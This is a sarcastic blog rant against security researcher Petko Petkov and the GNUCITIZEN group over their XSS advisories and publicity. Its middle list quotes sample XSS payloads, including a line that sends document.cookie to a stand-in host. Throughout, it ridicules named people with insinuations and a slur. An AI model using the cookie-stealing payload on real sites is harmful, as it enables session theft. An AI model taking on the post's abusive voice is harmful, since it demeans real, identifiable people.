That annoying GNUCITIZEN
It seems that there's a craze about applications being Javascript-enabled. It's a seriously insecure blackhole, dood! Between Bangbus spam on full-disclosure, Youtube pedophiles and other friendly inhabitants of the security community, we find Petko D. Petkov, also known as pdp, also known as GNUCITIZEN, web slayer and über underground hacker, known for the disclosure of repetitive web-related security advisories. Yack yack, the roof is on fire!
Not long ago, he came up with a pretty good timing for his new, re-designed and all-round 'bad boy looking' website, reborn as a (quoting literally):
"GNUCITIZEN is a creative hacker organization. (...) So who is part of the group? The GNUCITIZEN group has some quite unique talents on board. We constantly expand our core team through a well though screening process."
We thought at first that they were some sort of shady organization, right after reading the paragraph on screening. It was like, water-boarding training! How much water can you pull out of your lungs? Approved. Obviously this malign view went away after staring at the pictures for just a moment.
So, what's up with the GNUCITIZEN?
- It gets annoying to read his apocalyptic Engrish. There's not a single text from this young man that doesn't make you think something is seriously ticking inside someone else's head. It might be drugs, it might be some serious attention seeking disorder, or it might be BLACK PUBLIC RELATIONS (panic ensues at this point, take your shotgun).
- The overly repetitive pattern of the work: while they pretend to be an active group with a handful of different work areas, there's nothing but web security crap there. Not even the kind of issues that get your Wordpress blog credentials popped out. No, it's just a few different synonyms of Cross Site Scripting. Also known as the 'alert window denial of service' vulnerability class:
  - alert('Oh gnoes, cookie:' + document.cookie);
  - document.location('http://oh.gnoes.ru/cookie.php?' + document.cookie);
  - Don't forget local network port scanning, DANGER WILL ROBINSON!
- The presence of a Public Relations consultant (whatever that means), who happens to be Petkov's polski speaking chick!:
"Ivana Kalay is a leading Public Relations security (PRS) expert. She specializes in competitive intelligence, social engineering and Black PR. Ivana is also an active member of GNUCITIZEN group and founder of Spin Hunters, the first PRS company in United Kingdom."
Note that our friendly UK lobbyists have a law that basically makes all-things-hacking a bad thing! Maybe they will report themselves to Scotland Yard after reading this, and do us all a favor.
But please, stop the craze of nonsense security. Web security is important. Making a name for yourself just for fame and buzz is something nobody cares about. The so-called partial disclosure is just part of this madness. Security is simple: you either talk about it, or shut the f*ck up and keep it to yourself. Bragging is really retarded.